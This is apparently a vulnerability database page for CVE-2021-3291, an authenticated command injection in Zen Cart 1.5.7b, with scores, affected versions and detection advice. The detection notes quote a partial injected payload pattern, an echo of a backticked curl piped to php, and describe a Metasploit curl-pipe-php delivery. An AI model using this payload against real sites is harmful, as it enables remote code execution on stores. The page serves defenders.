CVE-2021-3291
published 2021-01-26CVE-2021-3291: Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
PriorityP259high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
16.78%
96.6th percentile
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zen-cart | zen_cart | — | — |
| zencart | zencart | >= 0 < 1.5.7c | 1.5.7c |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to the Zen Cart admin modules endpoint (index.php?cmd=modules&action=save) for configuration values containing SQL injection/command injection patterns such as single quotes, backticks, or shell command sequences (e.g., `curl ... |php`). ↗
- →Detect exploitation attempts by looking for the payload pattern in POST body parameters targeting Zen Cart module configuration fields: the string pattern True','F'); echo `curl ... |php`; // is the injected OS command payload. ↗
- →The Metasploit module uses a two-stage payload delivery: it starts a local HTTP server and injects a curl-pipe-php command into the Zen Cart database; detect outbound curl requests from the web server process to attacker-controlled infrastructure following a POST to the modules save endpoint. ↗
- ·Exploitation requires authenticated admin access; the vulnerability is only exploitable by an attacker who already holds valid admin credentials for the Zen Cart application. ↗
- ·The MODULE and SETTING options must match an installed/active Zen Cart module (e.g., payment/freecharger); the injection only fires when the affected module configuration is subsequently loaded/edited. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Zen Cart vulnerable to authenticated remote code execution
osv·2022-05-24
CVE-2021-3291 [HIGH] Zen Cart vulnerable to authenticated remote code execution
Zen Cart vulnerable to authenticated remote code execution
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
GHSA
Zen Cart vulnerable to authenticated remote code execution
ghsa·2022-05-24
CVE-2021-3291 [HIGH] CWE-78 Zen Cart vulnerable to authenticated remote code execution
Zen Cart vulnerable to authenticated remote code execution
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
No detection rules found.
No writeups or analysis indexed.
2021-01-26
Published